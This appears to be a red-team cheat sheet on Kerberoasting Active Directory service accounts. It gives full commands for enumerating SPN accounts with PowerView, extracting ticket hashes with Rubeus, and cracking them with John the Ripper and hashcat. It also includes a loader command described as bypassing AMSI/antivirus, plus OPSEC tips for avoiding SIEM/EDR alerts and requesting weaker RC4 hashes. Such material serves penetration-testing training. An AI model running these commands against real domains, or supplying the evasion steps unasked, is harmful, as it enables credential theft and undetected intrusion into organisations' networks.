Kerboroasting Attack

What is Kerberoasting Attack?

Kerberoasting is a technique used to extract password hashes of service accounts in Active Directory. Any domain user can request a Service Ticket (TGS) for any account with a Service Principal Name (SPN). Since this ticket is encrypted with the service account's password hash, it can be cracked offline to recover the plaintext password

Key Concepts

• SPN (Service Principal Name): A unique identifier that links a service (SQL, HTTP, etc.) to a specific user account.

• TGS (Ticket Granting Service): An encrypted ticket issued by the DC. If the service account has a weak password, the TGS encryption is vulnerable.

• Offline Cracking: The process of brute-forcing the hash on a local machine without generating further network alerts or account lockouts.

Enumeration

PowerViewAD-Module

. C:\AD\Tools\PowerView.ps1
Get-DomainUser -SPN
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select-Object SamAccountName, ServicePrincipalName

Hash Extraction

Rubeus (Direct)Rubeus (Loader)

C:\AD\Tools\Rubeus.exe kerberoast /stats
C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple
C:\AD\Tools\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

# Used to bypass AMSI/AV by loading Rubeus in memory
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

OPSEC

• Avoid mass roasting: Do not roast all users at once; go 1 by 1 using the /user parameter to avoid SIEM/EDR alerts.

• Ignore System Accounts: Do not target krbtgt. Its password is long, random, and managed by the system, making cracking impossible.

• Use RC4: When possible, use /rc4opsec to request RC4 hashes, which are much faster to crack than AES.

Cracking Offline

John the RipperHashcat

# Important: Remove the port (e.g., :1433) from the SPN in the hash file before running
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

# Mode 13100 is for Kerberos 5 TGS-REP etype 23 (RC4)
hashcat -m 13100 -a 0 hashes.txt wordlist.txt

Wordlists & Custom Dictionaries

• SecList: The ultimate collection of multiple types of lists used during security assessments. Use rockyou.txt or specific Kerberos lists.
• CeWL: A Custom Word List Generator that spiders a given URL to create a dictionary based on the words found on the website (ideal for targeted password cracking).